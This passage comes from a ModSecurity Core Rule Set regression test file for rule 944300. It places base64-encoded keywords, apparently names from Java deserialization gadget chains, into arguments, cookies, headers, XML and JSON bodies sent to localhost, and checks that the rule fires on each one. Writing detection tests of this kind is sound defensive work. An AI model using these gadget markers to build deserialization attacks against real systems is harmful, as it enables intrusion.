Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-288 - desc: "Cookie test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-289 - desc: "Cookie name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - 
test_title: 944300-290 - desc: "Request header test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-291 - desc: "XML attribute value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-292 - desc: "XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 
944300-293 - desc: "Nested XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-294 - desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-295 - desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\"}" - output: - log_contains: "id \"944300\"" - 
- - - test_title: 944300-296 - desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-297 - desc: "Argument test includes keyword d2hpbGVjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=d2hpbGVjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-298 - desc: "Argument name includes keyword d2hpbGVjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "d2hpbGVjbG9zdXJl=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-299 - desc: "Cookie test 
includes keyword d2hpbGVjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=d2hpbGVjbG9zdXJl - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-300 - desc: "Cookie name includes keyword d2hpbGVjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: d2hpbGVjbG9zdXJl=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-301 - desc: "Request header test includes keyword d2hpbGVjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: d2hpbGVjbG9zdXJl - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-302 - desc: "XML attribute value includes keyword d2hpbGVjbG9zdXJl" - stages: - - - 
stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-303 - desc: "XML element value includes keyword d2hpbGVjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "d2hpbGVjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-304 - desc: "Nested XML element value includes keyword d2hpbGVjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "d2hpbGVjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-305 - desc: "Content-Type text/plain includes keyword d2hpbGVjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=d2hpbGVjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-306 - desc: "Content-Type application/json arg value includes keyword d2hpbGVjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"d2hpbGVjbG9zdXJl\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-307 - desc: "Content-Type application/json arg name includes keyword d2hpbGVjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"d2hpbGVjbG9zdXJl\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-308 - desc: "Argument test includes keyword HdoaWxlY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=HdoaWxlY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-309 - desc: "Argument name includes keyword HdoaWxlY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "HdoaWxlY2xvc3VyZQ=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-310 - desc: "Cookie test includes keyword HdoaWxlY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HdoaWxlY2xvc3VyZQ - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-311 - desc: "Cookie name includes keyword HdoaWxlY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - 
Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HdoaWxlY2xvc3VyZQ=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-312 - desc: "Request header test includes keyword HdoaWxlY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HdoaWxlY2xvc3VyZQ - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-313 - desc: "XML attribute value includes keyword HdoaWxlY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-314 - desc: "XML element value includes keyword HdoaWxlY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - 
version: "HTTP/1.0" - data: "HdoaWxlY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-315 - desc: "Nested XML element value includes keyword HdoaWxlY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "HdoaWxlY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-316 - desc: "Content-Type text/plain includes keyword HdoaWxlY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=HdoaWxlY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-317 - desc: "Content-Type application/json arg value includes keyword HdoaWxlY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"HdoaWxlY2xvc3VyZQ\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-318 
- desc: "Content-Type application/json arg name includes keyword HdoaWxlY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"HdoaWxlY2xvc3VyZQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-319 - desc: "Argument test includes keyword B3aGlsZWNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=B3aGlsZWNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-320 - desc: "Argument name includes keyword B3aGlsZWNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "B3aGlsZWNsb3N1cmU=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-321 - desc: "Cookie test includes keyword B3aGlsZWNsb3N1cmU" - stages: - - - stage: - input: - 
dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=B3aGlsZWNsb3N1cmU - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-322 - desc: "Cookie name includes keyword B3aGlsZWNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: B3aGlsZWNsb3N1cmU=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-323 - desc: "Request header test includes keyword B3aGlsZWNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: B3aGlsZWNsb3N1cmU - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-324 - desc: "XML attribute value includes keyword B3aGlsZWNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - 
Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-325 - desc: "XML element value includes keyword B3aGlsZWNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "B3aGlsZWNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-326 - desc: "Nested XML element value includes keyword B3aGlsZWNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "B3aGlsZWNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-327 - desc: "Content-Type text/plain includes keyword B3aGlsZWNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=B3aGlsZWNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-328 - desc: "Content-Type application/json arg value includes keyword B3aGlsZWNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"B3aGlsZWNsb3N1cmU\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-329 - desc: "Content-Type application/json arg name includes keyword B3aGlsZWNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: 